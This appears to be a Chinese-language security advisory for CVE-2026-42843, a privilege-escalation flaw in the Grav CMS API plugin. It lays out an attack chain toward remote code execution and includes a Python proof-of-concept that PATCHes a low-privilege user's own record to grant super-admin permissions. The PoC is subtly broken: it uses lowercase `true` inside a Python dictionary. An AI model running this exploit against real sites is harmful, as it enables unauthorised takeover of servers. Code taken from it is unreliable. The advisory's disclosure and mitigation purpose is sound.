CVE-2026-42843 Grav API Plugin权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-42843

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Grav API Plugin

漏洞概述

Grav CMS的API插件在1.0.0-beta.15之前存在不安全的直接对象引用和逻辑缺陷。拥有基本API权限的认证用户可利用此漏洞修改自身配置，将权限提升至超级管理员，进而导致系统完全沦陷及远程代码执行。

技术细节

该漏洞位于Grav API插件的`UsersController::update`组件中。由于缺乏严格的权限校验，低权限用户可以利用IDOR漏洞直接访问并修改用户对象。攻击者构造包含特定权限字段（如`admin.super`）的请求数据，发送至API更新接口。系统未拦截该非法操作，导致攻击者成功将自身权限升级为超级管理员。获得最高权限后，攻击者可利用CMS的管理功能执行系统命令或上传Webshell，实现远程代码执行。

攻击链分析

STEP 1

步骤1：信息收集与认证

攻击者确定目标使用Grav CMS及其API插件，并获取一个具有基本API访问权限的合法账户凭证。

STEP 2

步骤2：构造恶意请求

攻击者分析API端点，发现UsersController::update接口存在IDOR漏洞，并构造包含权限提升字段的JSON数据包。

STEP 3

步骤3：发送漏洞利用请求

攻击者向API端点发送PATCH或POST请求，利用自身API Token修改当前用户的权限配置。

STEP 4

步骤4：权限提升

服务器接受请求，将攻击者的权限更新为admin.super和api.super，使其成为超级管理员。

STEP 5

步骤5：系统控制

利用获得的超级管理员权限，攻击者进一步执行系统命令或上传恶意文件，实现RCE并完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Grav API Plugin - Privilege Escalation (CVE-2026-42843)
# Description: Exploit IDOR to escalate user privileges to Super Admin

target_url = "http://target-site.com/api/users/self"
api_token = "LOW_PRIVILEGE_API_TOKEN"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json"
}

# Payload to grant super admin privileges
payload = {
    "permissions": {
        "admin": {
            "super": true,
            "login": true
        },
        "api": {
            "super": true
        }
    }
}

try:
    response = requests.patch(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully escalated privileges to Super Administrator.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Grav API Plugin < 1.0.0-beta.15

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Grav API插件的功能，或在WAF/防火墙层面配置规则，拦截针对/api/users路径的修改请求（如PATCH/PUT），并严密监控系统日志中异常的权限变更操作。